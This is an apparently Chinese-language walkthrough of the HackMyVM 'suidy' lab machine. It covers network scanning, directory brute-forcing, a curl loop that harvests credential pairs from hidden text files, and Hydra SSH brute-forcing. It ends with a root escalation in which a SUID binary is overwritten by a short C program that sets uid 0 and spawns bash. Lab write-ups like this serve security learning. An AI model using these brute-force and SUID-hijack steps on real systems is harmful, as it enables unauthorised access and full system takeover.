目录
信息收集
arp
nmap
WEB
web信息收集
gobuster
目录批量查看
hydra
ssh连接
提权
系统信息收集
提权
信息收集
arp
┌─[root@parrot]─[~/HackMyVM]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.115
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
---
192.168.9.120 08:00:27:34:fa:47 PCS Systemtechnik GmbH
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.056 seconds (124.51 hosts/sec). 6 responded
nmap
端口信息收集
┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.120 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-17 08:52 GMT
Nmap scan report for 192.168.9.120
Host is up (0.00027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:34:FA:47 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.94 seconds
服务版本信息收集
┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -O -p 22,80 192.168.9.120 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-17 08:55 GMT
Nmap scan report for 192.168.9.120
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
| 256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_ 256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:34:FA:47 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.85 seconds
WEB
web信息收集
从猜测是robots.txt目录中找到源码中的隐藏目录,然后又得知 /shehatesme/ 目录藏着很多 txt 文件!
我们爆破一下!
gobuster
┌─[root@parrot]─[~/HackMyVM]
└──╼ #gobuster dir -u http://192.168.9.120/shehatesme/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.120/shehatesme/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/full.txt (Status: 200) [Size: 16]
/search.txt (Status: 200) [Size: 16]
/privacy.txt (Status: 200) [Size: 16]
/about.txt (Status: 200) [Size: 16]
/blog.txt (Status: 200) [Size: 16]
/new.txt (Status: 200) [Size: 16]
/page.txt (Status: 200) [Size: 16]
/forums.txt (Status: 200) [Size: 16]
/jobs.txt (Status: 200) [Size: 16]
/other.txt (Status: 200) [Size: 16]
/welcome.txt (Status: 200) [Size: 16]
/admin.txt (Status: 200) [Size: 16]
/faqs.txt (Status: 200) [Size: 16]
/2001.txt (Status: 200) [Size: 16]
/link.txt (Status: 200) [Size: 16]
/space.txt (Status: 200) [Size: 16]
/network.txt (Status: 200) [Size: 16]
/google.txt (Status: 200) [Size: 16]
/folder.txt (Status: 200) [Size: 16]
/java.txt (Status: 200) [Size: 16]
/issues.txt (Status: 200) [Size: 16]
/guide.txt (Status: 200) [Size: 16]
/art.txt (Status: 200) [Size: 16]
/es.txt (Status: 200) [Size: 16]
/smilies.txt (Status: 200) [Size: 16]
/airport.txt (Status: 200) [Size: 16]
/secret.txt (Status: 200) [Size: 16]
/procps.txt (Status: 200) [Size: 16]
/pynfo.txt (Status: 200) [Size: 16]
/lh2.txt (Status: 200) [Size: 16]
/muze.txt (Status: 200) [Size: 16]
/alba.txt (Status: 200) [Size: 16]
/cymru.txt (Status: 200) [Size: 16]
/wha.txt (Status: 200) [Size: 16]
Progress: 415286 / 415288 (100.00%)
===============================================================
Finished
===============================================================
通过访问查看,发现这个应该就是ssh登录的账号和密码!我们提取出来!!
目录批量查看
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat user_pass.txt | head -n 51 | tail -n 34 | awk '{print $1}'
/full.txt
/search.txt
/privacy.txt
/about.txt
/blog.txt
/new.txt
/page.txt
/forums.txt
/jobs.txt
/other.txt
/welcome.txt
/admin.txt
/faqs.txt
/2001.txt
/link.txt
/space.txt
/network.txt
/google.txt
/folder.txt
/java.txt
/issues.txt
/guide.txt
/art.txt
/es.txt
/smilies.txt
/airport.txt
/secret.txt
/procps.txt
/pynfo.txt
/lh2.txt
/muze.txt
/alba.txt
/cymru.txt
/wha.txt
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat user_pass.txt | head -n 51 | tail -n 34 | awk '{print $1}' > user_pass.list
┌─[root@parrot]─[~/HackMyVM]
└──╼ #sed 's|^|http://192.168.9.120/shehatesme|' user_pass.list > 1.txt
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 1.txt
http://192.168.9.120/shehatesme/full.txt
http://192.168.9.120/shehatesme/search.txt
http://192.168.9.120/shehatesme/privacy.txt
http://192.168.9.120/shehatesme/about.txt
http://192.168.9.120/shehatesme/blog.txt
http://192.168.9.120/shehatesme/new.txt
http://192.168.9.120/shehatesme/page.txt
http://192.168.9.120/shehatesme/forums.txt
http://192.168.9.120/shehatesme/jobs.txt
http://192.168.9.120/shehatesme/other.txt
http://192.168.9.120/shehatesme/welcome.txt
http://192.168.9.120/shehatesme/admin.txt
http://192.168.9.120/shehatesme/faqs.txt
http://192.168.9.120/shehatesme/2001.txt
http://192.168.9.120/shehatesme/link.txt
http://192.168.9.120/shehatesme/space.txt
http://192.168.9.120/shehatesme/network.txt
http://192.168.9.120/shehatesme/google.txt
http://192.168.9.120/shehatesme/folder.txt
http://192.168.9.120/shehatesme/java.txt
http://192.168.9.120/shehatesme/issues.txt
http://192.168.9.120/shehatesme/guide.txt
http://192.168.9.120/shehatesme/art.txt
http://192.168.9.120/shehatesme/es.txt
http://192.168.9.120/shehatesme/smilies.txt
http://192.168.9.120/shehatesme/airport.txt
http://192.168.9.120/shehatesme/secret.txt
http://192.168.9.120/shehatesme/procps.txt
http://192.168.9.120/shehatesme/pynfo.txt
http://192.168.9.120/shehatesme/lh2.txt
http://192.168.9.120/shehatesme/muze.txt
http://192.168.9.120/shehatesme/alba.txt
http://192.168.9.120/shehatesme/cymru.txt
http://192.168.9.120/shehatesme/wha.t
#!/bin/bash
# 输入文件,包含 URL 列表
input_file="url_list.txt"
# 输出文件,存储 curl 命令的响应内容
output_file="response_output.txt"
# 检查输入文件是否存在
if [ ! -f "$input_file" ]; then
echo "错误:文件 $input_file 不存在。"
exit 1
fi
# 逐行读取输入文件中的 URL 并使用 curl 获取响应内容
while IFS= read -r url
do
# 执行 curl 命令并获取响应内容
response=$(curl -s "$url")
# 检查 curl 命令是否成功
if [ $? -eq 0 ]; then
# 将 URL 和响应内容追加到输出文件
echo "URL: $url" >> "$output_file"
echo "$response" >> "$output_file"
echo "" >> "$output_file"
else
# 如果 curl 命令失败,输出错误信息
echo "获取 $url 时发生错误。" >> "$output_file"
echo "" >> "$output_file"
fi
done < "$input_file"
# 完成消息
echo "所有 URL 的响应内容已保存到 $output_file 文件中。"
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat output.txt
URL: http://192.168.9.120/shehatesme/full.txt
yuijhse/hjupnkk
URL: http://192.168.9.120/shehatesme/search.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/privacy.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/about.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/blog.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/new.txt
hidden1/passZZ!
URL: http://192.168.9.120/shehatesme/page.txt
jhfbvgt/iugbnvh
URL: http://192.168.9.120/shehatesme/forums.txt
john765/FDrhguy
URL: http://192.168.9.120/shehatesme/jobs.txt
maria11/jhfgyRf
URL: http://192.168.9.120/shehatesme/other.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/welcome.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/admin.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/faqs.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/2001.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/link.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/space.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/network.txt
mmnnbbv/iughtyr
URL: http://192.168.9.120/shehatesme/google.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/folder.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/java.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/issues.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/guide.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/art.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/es.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/smilies.txt
smileys/98GHbjh
URL: http://192.168.9.120/shehatesme/airport.txt
nhvjguy/kjhgyut
URL: http://192.168.9.120/shehatesme/secret.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/procps.txt
theuser/thepass
URL: http://192.168.9.120/shehatesme/pynfo.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/lh2.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/muze.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/alba.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/cymru.txt
jaime11/JKiufg6
URL: http://192.168.9.120/shehatesme/wha.txt
jaime11/JKiufg6
简单查看后,发现也就是几个用户,好多都是重复的!
yuijhse/hjupnkk
jaime11/JKiufg6
hidden1/passZZ!
jhfbvgt/iugbnvh
john765/FDrhguy
mmnnbbv/iughtyr
maria11/jhfgyRf
smileys/98GHbjh
nhvjguy/kjhgyut
theuser/thepass
hydra
爆破ssh吧!
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 2.txt
yuijhse/hjupnkk
jaime11/JKiufg6
hidden1/passZZ!
jhfbvgt/iugbnvh
john765/FDrhguy
mmnnbbv/iughtyr
maria11/jhfgyRf
smileys/98GHbjh
nhvjguy/kjhgyut
theuser/thepass
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 2.txt | awk -F "/" '{print $1}' > user.txt
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat 2.txt | awk -F "/" '{print $2}' > pass.txt
┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #hydra -L user.txt -P pass.txt ssh://192.168.9.120
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-17 10:29:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:10/p:10), ~7 tries per task
[DATA] attacking ssh://192.168.9.120:22/
[22][ssh] host: 192.168.9.120 login: theuser password: thepass
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-17 10:29:32
ssh连接
┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #ssh theuser@192.168.9.120
theuser@192.168.9.120's password:
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 17 11:32:16 2024 from 192.168.9.115
theuser@suidy:~$ id
uid=1000(theuser) gid=1000(theuser) groups=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
theuser@suidy:~$ ls
user.txt
theuser@suidy:~$ cat user.txt
HMV2353IVI
得到user.txt
提权
系统信息收集
theuser@suidy:~$ find / -perm -u=s -type f 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
theuser@suidy:/home/suidy$ ls
note.txt suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ ls
note.txt suidyyyyy
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!
-suidy
要先执行一下 suidyyyyy 这个文件,才能查看 note.txt 文件!
当我们执行 suidyyyyy 这个文件时,我们就已经切换到了 suidy 用户!
suidy@suidy:/home/suidy$ ls -al suidyyyyy
-rwsrwsr-x 1 root theuser 16704 Sep 26 2020 suidyyyyy
这个文件具有root权限!
提权
suidy@suidy:/home/suidy$ nano exp.c
Unable to create directory /home/theuser/.local/share/nano/: Permission denied
It is required for saving/loading search history or cursor positions.
Press Enter to continue
suidy@suidy:/home/suidy$ cat exp.c
# include <stdio.h>
# include <unistd.h>
int main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
我打算直接替换这个 suidyyyyy 文件!
theuser@suidy:/home/suidy$ pwd
/home/suidy
theuser@suidy:/home/suidy$ cd /tmp
theuser@suidy:/tmp$ cp /home/suidy/exp.c .
theuser@suidy:/tmp$ ls
exp.c systemd-private-e24681540c8d4d4abf3f7713d0124638-systemd-timesyncd.service-Egz94r
theuser@suidy:/tmp$ gcc exp.c -o suidyyyyy
exp.c: In function ‘main’:
exp.c:7:5: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/bash");
^~~~~~
theuser@suidy:/tmp$ cp suidyyyyy /home/suidy/suidyyyyy
theuser@suidy:/tmp$ cd /home/suidy/
theuser@suidy:/home/suidy$ ls
exp.c note.txt suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)